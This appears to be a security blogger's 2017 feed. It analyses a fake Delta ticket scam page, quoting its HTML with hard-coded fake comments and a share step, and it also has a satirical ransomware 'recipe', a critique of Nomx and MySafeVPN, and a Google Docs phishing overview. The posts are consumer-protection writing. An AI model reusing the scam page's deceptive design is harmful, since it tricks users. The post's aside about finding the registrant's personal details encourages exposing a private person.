Immediately I see that this site isn't secure (no HTTPS). I clicked through the questions, and reached a page that urged me to share the link on Facebook, Like a page (I never did find out what Page it wanted me to Like), and then I would somehow get the tickets. Since there was no way I was going to Share the link, this was my stopping point.

I looked up whether or not it would be possible to trick the site into thinking the link was shared, but I didn't see any hacky javascript to check that. It would have to be something hacky because you can't really track whether or not a user shared a Facebook post without having the user authenticate to your site using Facebook. (Correct me if I'm wrong here. I'm not an expert on Facebook's Share tracking)

At the bottom of the page, there were Facebook comments from "users" confirming that they receive tickets. This is a common method scammers use in an attempt to legitimize their site.

A Peek Under The Hood

I took a minute to look through the source code for the site and the first thing I noticed was that everything was hard coded, even the so-called Facebook comments. The "user" images came from a site called randomuser.me a.k.a. stock photos.

I know it's a little hard to see (feel free to zoom in), but these are all hard coded comments found on the page.

And then here is a closer look. You can see where they hard coded the number of likes the comments have, along with the age of the comments.

<div id="fb1" class="item hidden">
    <img class="profileimg" src="https://randomuser.me/api/portraits/women/53.jpg" />
    <p class="comtxt"><span class="name">Radford Sarah</span> Wow, i won a free tickets from Delta Airline. </p>
    <p class="combot"><span class="ago">Just Now</span> Â· <span class="fblike">Like</span></p>
</div>
<div class="item">
    <img class="profileimg" src="https://randomuser.me/api/portraits/women/46.jpg" />
    <p class="comtxt"><span class="name">Deleon Sandra</span> Such a Great Service! Thanks Delta Airline.</p>
    <p class="combot"><span class="ago">11 minutes ago</span> Â· <span class="fblike">Like</span><span class="likes totlikes">267</span></p>
</div>
<div class="item">
    <img class="profileimg" src="https://randomuser.me/api/portraits/women/89.jpg" />
    <p class="comtxt"><span class="name">Brenda Vaughn</span> I am finally going  to France with my friends.. Thanks Delta Airline!</p>
    <p class="combot"><span class="ago">17 minutes ago</span> Â· <span class="fblike">Like</span><span class="likes totlikes">63</span></p>
</div>

For an extra treat, the page had some Javascript that made a new comment appear to make it look like the Facebook comments were being actively updated and added by other users. It also allows the user to add their own comments and fades it into the comment list, even though there isn't any indication that the comments is persisted anywhere.

The more interesting part about this is that the site never asked for any information from me and based on the source code, I don't think it was ever going to. Based on the code below, it seems as though the host just wants you to share the link. It doesn't have a way to verify that you actually did it, and there aren't any conditional statements to advance the user to another section. No matter what the user did, they would always get a pop-up telling them to complete Step 1 when they tried to progress to Step 2. If getting personal information from the user isn't the objective here, then this site isn't a phishing site. It's more than likely used to deliver malware.

<div id="final">
    <p align="center" class="prodname">Step 1</p>
    <p align="center" class="prodname">Share this page by clicking "SHARE" button and type "Thanks #Delta Airline!" in the comments field!</p>
    <p align="center">
        <a id="go" href="javascript:void(0)" onClick="gt=window.open('https://www.facebook.com/sharer/sharer.php?u=' + link + '', 'gt','top=176,left=500,toolbar=no,location=yes,directories=no,status=no, menubar=no,scrollbars=no,resizable=no,width=800,height=50'); gt.onload = function () {gt.focus();}; return false;"><strong><img src="http://i.imgur.com/xzmclDm.png" align="top" border="0"></strong></a>
    </p>
    <div class="cont clearfix">
        </br>
        </br>
        <p align="center" class="prodname">Step 2</p>
        <div align="center">
            <p align="center" class="prodname">Click Like</a></p>
            <a id="to" href='javascript:window.alert("Complete Step 1 to get the Coupon!");'> <br/><img src="http://i.imgur.com/7FesHcD.jpg"> </a>
            <div class="loading-wrap">
                <p align="center" class="prodname">Verifying steps </p>
                <img src="http://i.imgur.com/x557web.gif" height="75" alt="Loader image not found">
            </div>
        </div>
    </div>
</div>

I also went back through the site with Google Chrome's inspection tool to watch network traffic and found that the site was pulling information about my browser and operating system, as well as information about my mouse movements. The site also collected information about my geographic location. All of this seems to be in line with my theory about the site delivering malware. Collecting information about browser version and operating system could be used to determine whether or not the user's machine is vulnerable and code on the backend could be making a decision about whether or not to deliver the malware.

I ran the host through a malware scanner called VxStream (hosted on Hybrid-Analysis.com) and found that if the user is running Internet Explorer the website actually does something more interesting. It launched another instance of Internet Explorer. Read through a bunch of registry settings, including security settings for the system. It requested access to the rasman service, which is used to establish remote connections to a service, and dropped a few files. It does look like it was preparing to install something if the user was running the operating system and browser, but I can't be entirely sure. I was in a sandbox and that isn't always reliable if the malware is used evasion tactics.

Conclusion

Server IP: 104.18.58.70
Hosted by: Cloudflare
Web server: nginx
Domain: Deltaa-com.us

I did a WHOIS lookup on the domain and found out that our registrant didn't bother to obscure his personal information.

I blacked out his phone number, mailing address, and email address, but...you know...it's public information so if you want to find it... that's not my business.

For this investigation, my results are inconclusive. I'm fairly confident that this site does distribute malware, but I cannot say what kind and what it does other than establishing a connection to a remote host (possibly a botnet?). VirusTotal now has 2 URL scanners that have identified this host as malware (when I first checked it didn't have any hits).

virustotal.com/en/url/97553c0...

It has also now been blacklisted on Sucuri's Sitecheck.

sitecheck.sucuri.net/results/deltaa-com.us

I assume it's only a matter of time now before Cloudflare shuts down the host, but it will probably pop up again somewhere else with a different IP address and/or hostname. This is the game of Wack-A-Mole that happens all of the time with these types of sites.

Have you guys seen any particularly nasty scams on Facebook? What was the most outrageous claim?

Update 06/12 This host is a known affiliate link site. The user makes money when others share the their link. Harmless to the user.

Can you name a female equivalent to Mark Zuckerberg, Steve Jobs, or Bill Gates?

Antoinette Maria — Fri, 19 May 2017 02:47:51 +0000

This question came up while I was doing some reading for a presentation I had to give at work about the gender gap in tech. I was hard pressed to answer this question off of the top of my head and I'm sure if I employ a little bit of Google-foo I could dig up a few. For example, one of the cofounders of Cisco was a woman (I can't say how technical she was). So, can you name a woman who would be in the same league as tech founders like Mark, Steve, or Bill?

Note: Sheryl Sandberg doesn't count. The Yahoo CEO doesn't count. Let it be known that I am aware that Steve Wozniak was actually the technical mind behind Apple, but I say Steve Jobs because of the social relevance of his name in this particular instance.

Here is my entry. The founder of LMG Security is a woman named Sherri Davidoff. Author of a couple of technical books. Over a decade of experience in information security. Highly technical.

Recipe for Infection: Ransomware

Antoinette Maria — Tue, 16 May 2017 18:33:17 +0000

Cooking Time: On average < 1 minute | Serving Size: Thousands

Ingredients:

1 highly motivated malicious actor
At least 1 ransomware program with a strong encryption algorithm
1 Tor Client (optional)
1 malicious email (can be substituted with a compromised website or malicious download)
1 vulnerable computer

Directions

On the vulnerable computer, open the malicious email you've received and click the link or download the attachment. If there's a link or anything to click in the attachment, click it. This will trigger the download of the ransomware program (or the Tor client). Note: This email could come from a perfect stranger or someone you know.
(Optional) Once the Tor client is downloaded, let it connect to a malicious domain to download the ransomware program.
Once the ransomware program is downloaded, run it and set aside for about 30 seconds - 17 minutes depending on the ransomware and the amount of files on the vulnerable machine. The ransomware will copy itself to memory to continue running and delete the originally downloaded file. It will then parse through all of the files on the vulnerable computer (and any mapped network drives) and encrypt them using the strong encryption algorithm coupled with the program. Note: You'll want to be sure the encryption or else a security research team might write a decryption algorithm and give it out for free to help people.
Allow the ransomware to spread to share drives to infect and encrypt all other machines that might be connected to the vulnerable computer.
After encryption is complete, open the instructions file dropped on the desktop of your vulnerable computer. This file will let you know how much to pay the highly motivated malicious actor and where to send the money (usually BitCoin).
Spend 10 minutes trying to open up your encrypted files only to see a bunch of garbled gibberish and then scream.
Spend 2 hours on the phone with tech support yelling about your files being gone and realize you don't have any data backups.
Mix steps 6 and 7 together, blend until smooth. Follow up with a good cry in the fetal position.
Mull over paying the ~$500 ransom because you really want that photo of you and your late grandmother back.
(Optional) Pay the ransom. Note: Take this step at your own risk. There is no guarantee that you'll get your files back

And voila, you have a ransomware infected machine. Quick and easy and serves thousands. Perfect for causing million to billion dollar damage in data loss for a large scale enterprise or government organization. Many modifications to the recipe exist. Some like to deliver the ransomware program with a drive by attack so that you (the user) don't have to actually click anything. You just have to visit an infected website. Other modifications include no real method to decrypt encrypted data, saving credentials and valuable information found in files on the computer, installing other malware on the machine (like a bot for a botnet), and running the ransomware as a service on the vulnerable machine.

Want to add a little extra?
Create some type of system to complete regular backups of your system that aren't continuously connected to the computer.

Suggested Drink Pairing
Vodka. Lots of Vodka.

How Companies Prey On Your Ignorance of Tech and Your Fear of Hackers

Antoinette Maria — Fri, 05 May 2017 20:19:39 +0000

"Everything Else Is Insecure"

Meet Nomx.

The "patent-pending nomx protocol provides secure, encrypted e-mail, messaging, audio and video communication services through a platform-agnostic protocol." This innovative protocol is delivered to you via a physical device that "allows users to transmit and receive secure communications using traditional email or messaging client."
Nomx: Everything else is insecure

Would you buy this product? Think it over...I'll wait.

What if I told you that inside that Nomx box was a Raspberry Pi? Are you still impressed? Okay and then...what if I told you Nomx's special protocol was outdated versions of Postfix and Dovecot running on Raspbian?

Are you beginning to understand where I'm headed now? If you guessed "Nomx is full of sh**", you guessed correctly. Scott Helme, a UK-based security researcher was asked by BBC to examine the Nomx device because a lot of people were getting pretty excited about it. The company was claiming that they were the most secure because Google and Yahoo had already been hacked and they could guarantee that user's emails wouldn't be hacked. Scott Helme found that Nomx was largely underwhelming. I won't rehash it all here, but if you're interested check out his write up on his blog.

"SSL's that actually protect you are very expensive and have a long process"

Next up, shortly after the ISP legislation everyone began to seriously consider using VPNs for all of their browsing needs (except for Netflix). During that period of time, a company called MySafeVPN popped up to get in on the action. There were a few problems here. The first problem is that MySafeVPN presented itself as an affiliate of another company called Plex. Plex vehemently denied having any ties to MySafeVPN.

Crazy? It gets crazier, MySafeVPN's billing site (which oddly took you to myvpnhub.com) was not secure. A lack off HTTPS on a VPN site doesn't inspire confidence. The quote above was their response when asked about the missing SSL certificates. Well things went down hill from there. Turns out Plex had a data breach a few years ago that revealed email addresses, so that explains how Plex customers all received an email saying this new VPN service was associated with Plex. The whole ugly situation devolves into a twitter battle between security researchers and MySafeVPN, a racial slur, and a sketchy phone call.

You can read about it on Troy Hunt's blog. MySafeVPN's Twitter account is now suspended (probably because of the racial slur or the lying and using stolen email addresses to promote their business, it's hard to tell).

Nothing is 100% Secure

Companies, like Nomx and MySafeVPN, rely on the fact that you more than likely have no idea how encryption, networking, hacking, etc. works. They throw together a bunch of really technical terms that sound like they make sense and pray you can't tell the difference. ("Our billing site doesn't need SSL because we actually send that traffic back through our own VPN encrypted hyperloop tunnel" Did I do it right?). They feed on your fear that you can be hacked at any moment while telling you that you're powerless unless you buy their product.

Don't be fooled by their claims, there are things you can do to avoid being tricked into buying mediocre security services

Do your research on a product before you buy it. Chances are someone (probably a security researcher) has already reviewed it and written about it.
Don't trust any company that says it wrote its own encryption algorithm. Seriously. Just don't. Ever.
Be wary of any company claiming to be World's Most Secure thing. The truth is, 100% security is a myth and anyone who tells you otherwise is playing you like a violin.

We have this saying in security, "It's not a matter of 'if', but 'when'" when we talk about a hack or a data breach. It happens to everyone, both companies and individuals, on differing scales and differing degrees of impact. In your personal life and at work, you are your best defense against a breach. Taking the time to inform yourself of a risk before taking action is the best way to protect yourself.

Check out Matt Kiser's The Normal Person's Guide To Internet Security for tips.

Don't Click That Google Docs Link: An Overview of The Google Docs Phish Going Around Today

Antoinette Maria — Wed, 03 May 2017 21:28:19 +0000

Just before 2 p.m. CST (-0500 GMT) today I received an email from an acquaintance of mine inviting me to view a document on Google Docs. I was immediately suspicious because the 'To' field of the address was a Mailinator address, a throw away email address. Red flag number one. Red flag number two is that I wasn't expecting any documents or emails from that person and that's all I needed to know it was probably a phish. Others weren't so lucky.

It should be noted that by this point if you Googled 'Mailinator' you also saw a bunch of tweets about the phishing campaign.

It's old news in the world of security now, but for the past two hours or so someone (no one knows who yet) has been sending out a phishing email that looks exactly like the one I received.

If you clicked the link, you are taken to Google's account sign in page to authenticate with OAuth. This page is legitimate. However, if you look closely, you're actually giving access to an app called Google Docs. Let's all pause here and ask ourselves, "Why would Google Docs need my permission to access anything?". It doesn't. The app is fake and hosted on Cloudflare. It wasn't long before Cloudflare took the app down and Google revoked access so the phish is effectively dead now but here are a few questions you might have.

What if I already allowed the access? Well... the application now has access to all of your emails. It also sent a copy of the malicious email you received to everyone you've ever emailed. You should probably go ahead and revoke that access now friend. Here's how
No word yet on what the attacker is doing with information found in mailboxes. Rumors are abundant though.

Would two factor authentication have helped? Nah, sorry. 2FA wouldn't have played a role in this app gaining access since it is an OAuth phish.

Who else was affected? I heard that a bunch of schools (K-12 and colleges) and government agencies were hit pretty hard.

Here are a few articles for your reading pleasure if you need more info:
New Google Docs phishing scam, almost undetectable - Reddit
Sudden Google Docs Spam? - Reddit
A gif on Twitter of someone clicking on the link
Someone Hit the Internet with a Massive Google Doc Phishing Attack - Motherboard

I hate to sound like the mandatory phishing training everyone at every company has to take but, seriously, think before you click. I know this one looked really convincing, but there's nothing wrong with being suspicious of emails you weren't expecting to get (even if the person you sent them is someone you know).